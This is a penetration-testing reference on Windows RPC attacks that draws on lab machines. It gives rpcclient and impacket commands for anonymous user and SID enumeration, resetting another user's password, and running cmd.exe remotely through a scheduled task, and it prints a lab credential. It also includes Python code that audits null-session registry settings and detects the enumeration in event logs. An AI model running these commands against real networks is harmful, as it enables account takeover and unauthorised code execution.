# RPC Exploitation
## Overview
Remote Procedure Call (RPC) on Windows provides inter-process communication between hosts. Clients reach the Endpoint Mapper on port 135/TCP, which redirects them to dynamically assigned high ports; the rpcclient commands below instead reach the same SAMR, LSARPC and SRVSVC interfaces over SMB named pipes (IPC$ on 445/TCP). RPC null sessions allow enumeration of users, groups, shares, and SIDs without authentication. With credentials, RPC can be leveraged to create services, schedule tasks, and access the remote registry.
## Prerequisites
- rpcclient (part of Samba suite)
- impacket suite (rpcdump.py, samrdump.py, lookupsid.py)
- Valid credentials for service creation and registry access
## Detection & Enumeration
### RPC Null Session Enumeration
```bash
rpcclient -U "" -N <IP>               # Connect with a null session
# Once connected:
rpcclient $> srvinfo                  # Server information
rpcclient $> enumdomusers             # Enumerate domain users
rpcclient $> enumdomgroups            # Enumerate domain groups
rpcclient $> querydispinfo            # Display information about users
rpcclient $> lookupnames <username>   # Look up the SID for a username
rpcclient $> netshareenumall          # Enumerate shares
rpcclient $> lsaenumsid               # Enumerate SIDs
```
### RPC with Credentials
```bash
rpcclient -U '<domain>/<user>%<password>' <IP>   # Authenticated connection
rpcclient -U 'blackfield/support%#00^BlackKnight' 10.10.10.192
```
### Password Reset via RPC
With the ForceChangePassword privilege over the target, reset another user's password:
```bash
rpcclient -U '<domain>/<user>' <IP>
rpcclient $> setuserinfo <target_user> 23 <new_password>   # Info level 23 carries the password
```
### Impacket RPC Tools
```bash
impacket-rpcdump <IP>                                   # Dump RPC endpoints from the Endpoint Mapper
impacket-lookupsid <domain>/<user>:<pass>@<IP>          # Enumerate users via SID walking (RID cycling)
impacket-samrdump <domain>/<user>:<pass>@<IP>           # Dump SAM accounts via SAMR
impacket-services <domain>/<user>:<pass>@<IP> list      # List services via SVCCTL
```
## Exploitation / Execution
### Service Creation via RPC
Services can be created remotely over the SVCCTL interface to execute binaries:
```bash
rpcclient $> svcenum   # Enumerate existing services
# Create and start a service using impacket-services or sc.exe
```
### Task Scheduling via ATSVC
The ATSVC named pipe allows remote task scheduling:
```bash
impacket-atexec <domain>/<user>:<pass>@<IP> cmd.exe   # Execute via a scheduled task
```
### Remote Registry Access
```bash
# Query and modify remote registry keys via the WINREG interface (\pipe\winreg, MS-RRP);
# this requires the RemoteRegistry service to be running on the target, which it is not
# by default on Windows client editions
```
## Common Pitfalls
- Warning: RPC null sessions are disabled on modern Windows systems (post-Server 2003) unless explicitly enabled
- Warning: High-port dynamic RPC endpoints may be blocked by firewalls between network segments
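The first pitfall above hinges on a handful of registry values that decide whether a host still answers null sessions. As an added example (not code from this page, Samba or impacket), the following Python parses a regedit `.reg` export of the two relevant keys, decodes the `dword:` and `hex(7):` (REG_MULTI_SZ) encodings regedit emits, and reports every setting that leaves anonymous enumeration open. The key paths and value names are the real Windows ones; the two sample exports, the `parse_reg_export` and `null_session_findings` helpers, and the "treat a missing value as the modern default" assumption are constructed for this example.

```python
"""Audit an exported registry fragment for null-session exposure.

The .reg format stores DWORDs as dword:XXXXXXXX and REG_MULTI_SZ as
hex(7): UTF-16LE bytes (comma separated, continued with a trailing backslash).
Both sample exports at the bottom are constructed for this example.
"""
import re

LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
SRV_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
_VALUE_RE = re.compile(r'"([^"]+)"=(dword:[0-9a-fA-F]{8}|hex\(7\):.*)$')


def _decode_multi_sz(hexdata):
    """hex(7) payload -> list of strings (NUL separated, double NUL terminated)."""
    raw = bytes(int(b, 16) for b in hexdata.split(",") if b)
    return [s for s in raw.decode("utf-16-le").split("\x00") if s]


def parse_reg_export(text):
    """Return {key_path: {value_name: value}} for the dword/hex(7) values in a .reg file."""
    keys, current, pending = {}, None, None  # pending = [name, hex collected so far]
    for raw in text.splitlines():
        line = raw.strip()
        if pending is not None:  # continuation line of a hex(7) value
            pending[1] += line.rstrip("\\")
            if not line.endswith("\\"):
                keys[current][pending[0]] = _decode_multi_sz(pending[1])
                pending = None
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = _VALUE_RE.match(line)
        if not m or current is None:
            continue
        name, value = m.groups()
        if value.startswith("dword:"):
            keys[current][name] = int(value[6:], 16)
        else:
            data = value[len("hex(7):"):]
            if data.endswith("\\"):
                pending = [name, data.rstrip("\\")]
            else:
                keys[current][name] = _decode_multi_sz(data)
    return keys


def null_session_findings(keys):
    """Settings that keep anonymous enumeration open. A missing value is assumed to
    be the modern default (RestrictAnonymousSAM=1, RestrictNullSessAccess=1, no pipes)."""
    lsa, srv, findings = keys.get(LSA_KEY, {}), keys.get(SRV_KEY, {}), []
    if lsa.get("RestrictAnonymousSAM", 1) == 0:
        findings.append("RestrictAnonymousSAM=0: anonymous SAM account enumeration allowed")
    if lsa.get("RestrictAnonymous", 0) != 1:
        findings.append("RestrictAnonymous!=1: anonymous share enumeration not blocked")
    if lsa.get("EveryoneIncludesAnonymous", 0) == 1:
        findings.append("EveryoneIncludesAnonymous=1: anonymous inherits Everyone permissions")
    if srv.get("RestrictNullSessAccess", 1) == 0:
        findings.append("RestrictNullSessAccess=0: null sessions may reach any pipe or share")
    for name in ("NullSessionPipes", "NullSessionShares"):
        for entry in srv.get(name, []):
            findings.append(f"{name} lists {entry!r}: reachable over a null session")
    return findings


# Constructed export: the "explicitly enabled" case, with samr and lsarpc opened to null sessions.
WEAK_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictAnonymous"=dword:00000000
"RestrictAnonymousSAM"=dword:00000000
"EveryoneIncludesAnonymous"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"RestrictNullSessAccess"=dword:00000000
"NullSessionPipes"=hex(7):73,00,61,00,6d,00,72,00,00,00,6c,00,73,00,61,00,72,00,\
  70,00,63,00,00,00,00,00
"""

# Constructed export: the hardened counterpart (empty pipe list, enumeration restricted).
HARDENED_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictAnonymous"=dword:00000001
"RestrictAnonymousSAM"=dword:00000001
"EveryoneIncludesAnonymous"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"RestrictNullSessAccess"=dword:00000001
"NullSessionPipes"=hex(7):00,00
"""

if __name__ == "__main__":
    for label, export in (("weak", WEAK_EXPORT), ("hardened", HARDENED_EXPORT)):
        print(label, null_session_findings(parse_reg_export(export)) or ["no findings"])
```

Domain controllers ship with a non-empty NullSessionPipes list for down-level compatibility, so a pipe entry is a prompt to review rather than an automatic defect; the other four values map one-to-one onto the "Network access:" security policy settings.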
## OPSEC Considerations
- Shield: RPC enumeration generates Event ID 5145 (network share object checks)
- Shield: The number of SID enumeration requests is visible and can be flagged as reconnaissance
- Shield: Password reset operations generate Event ID 4724
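The three bullets above describe what the enumeration, service/task and password-reset sections of this page leave in the Security log. As an added example (not code from this page or from the rpcclient/impacket projects), the following Python models 5145 and 4724 records as the field dicts a SIEM would extract and applies two detections: a sliding-window count of distinct RPC named pipes opened on IPC$ by one (source address, account) pair, which catches the null-session walk of srvsvc/samr/lsarpc, and a filter for 4724 events where the subject reset somebody else's password. Event 5145 is only written when the Detailed File Share audit subcategory is enabled. The field names, the five-minute window, the three-pipe threshold and every sample record are assumptions constructed for this example.

```python
"""Flag MS-RPC enumeration and password resets in Windows Security events.

Events are dicts holding the fields a SIEM extracts from Security Event IDs
5145 (network share object checked) and 4724 (password reset). The sample
events at the bottom are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# IPC$ named pipes behind the RPC interfaces that rpcclient and impacket use.
RPC_PIPES = {
    "samr": "SAMR: user/group enumeration, password reset",
    "lsarpc": "LSARPC: SID lookups and LSA policy",
    "srvsvc": "SRVSVC: share enumeration",
    "svcctl": "SVCCTL: service control manager",
    "atsvc": "ATSVC: legacy task scheduler",
    "winreg": "WINREG: remote registry",
}
ANONYMOUS_LOGON_SID = "S-1-5-7"
WINDOW = timedelta(minutes=5)
PIPE_THRESHOLD = 3  # distinct pipes from one (source, account) inside WINDOW (assumed)


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def find_rpc_enumeration(events, window=WINDOW, threshold=PIPE_THRESHOLD):
    """One finding per (source address, subject SID) that opened `threshold` or
    more distinct RPC pipes on IPC$ inside any `window`-long span of time."""
    hits = defaultdict(list)
    for ev in events:
        if ev["event_id"] != 5145 or not ev["share_name"].upper().endswith("IPC$"):
            continue
        pipe = ev["relative_target_name"].lower()
        if pipe in RPC_PIPES:
            hits[(ev["source_address"], ev["subject_sid"])].append((_ts(ev["time"]), pipe))

    findings = []
    for (src, sid), seq in hits.items():
        seq.sort()
        start = 0
        for end in range(len(seq)):
            while seq[end][0] - seq[start][0] > window:  # slide the window forward
                start += 1
            pipes = {p for _, p in seq[start:end + 1]}
            if len(pipes) >= threshold:
                findings.append({
                    "source_address": src,
                    "subject_sid": sid,
                    "anonymous": sid == ANONYMOUS_LOGON_SID,
                    "pipes": sorted(pipes),
                    "first_seen": seq[start][0].isoformat(sep=" "),
                })
                break  # report each actor once
    return findings


def find_password_resets(events):
    """4724 events where the subject reset another account's password; a
    ForceChangePassword reset over SAMR looks exactly like this in the log."""
    return [
        {"time": ev["time"], "actor": ev["subject_account"], "target": ev["target_account"]}
        for ev in events
        if ev["event_id"] == 4724 and ev["subject_sid"] != ev["target_sid"]
    ]


# Constructed sample: a null session from 10.10.14.5 walking srvsvc/samr/lsarpc,
# one benign authenticated share listing, and a helpdesk account resetting jdoe.
_IPC = "\\\\*\\IPC$"
SAMPLE_EVENTS = [
    {"time": "2024-03-01 09:00:01", "event_id": 5145, "subject_sid": ANONYMOUS_LOGON_SID,
     "subject_account": "ANONYMOUS LOGON", "source_address": "10.10.14.5",
     "share_name": _IPC, "relative_target_name": "srvsvc"},
    {"time": "2024-03-01 09:00:02", "event_id": 5145, "subject_sid": ANONYMOUS_LOGON_SID,
     "subject_account": "ANONYMOUS LOGON", "source_address": "10.10.14.5",
     "share_name": _IPC, "relative_target_name": "samr"},
    {"time": "2024-03-01 09:00:03", "event_id": 5145, "subject_sid": ANONYMOUS_LOGON_SID,
     "subject_account": "ANONYMOUS LOGON", "source_address": "10.10.14.5",
     "share_name": _IPC, "relative_target_name": "lsarpc"},
    {"time": "2024-03-01 09:00:04", "event_id": 5145, "subject_sid": ANONYMOUS_LOGON_SID,
     "subject_account": "ANONYMOUS LOGON", "source_address": "10.10.14.5",
     "share_name": _IPC, "relative_target_name": "lsarpc"},
    {"time": "2024-03-01 09:10:00", "event_id": 5145, "subject_sid": "S-1-5-21-1-2-3-1001",
     "subject_account": "jdoe", "source_address": "10.10.20.7",
     "share_name": _IPC, "relative_target_name": "srvsvc"},
    {"time": "2024-03-01 09:12:00", "event_id": 4724, "subject_sid": "S-1-5-21-1-2-3-1104",
     "subject_account": "svc_helpdesk", "target_sid": "S-1-5-21-1-2-3-1001",
     "target_account": "jdoe"},
]

if __name__ == "__main__":
    for f in find_rpc_enumeration(SAMPLE_EVENTS):
        print("RPC enumeration:", f)
    for r in find_password_resets(SAMPLE_EVENTS):
        print("Password reset:", r)
```

Service creation over SVCCTL additionally surfaces in the System log as Event ID 7045 (a service was installed), which this block does not model; correlating a svcctl hit here with a 7045 from the same host is the usual next step.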
## Post-Exploitation Value
- User/group enumeration reveals privileged accounts and attack paths
- SID walking reveals all domain objects including trust relationships
- Password reset capability enables account takeover
- Service creation enables persistence and lateral movement
## Cross-References
### Tool References
| Tool | Link |
|---|---|
| rpcclient | Built-in with Samba |
| impacket | https://github.com/fortra/impacket |
### Source Machines
- Active (Easy, AD) - RPC/SMB enumeration and GPP extraction
- Blackfield (Hard, AD) - RPC password reset via ForceChangePassword
- Support (Easy, AD) - RPC enumeration for domain discovery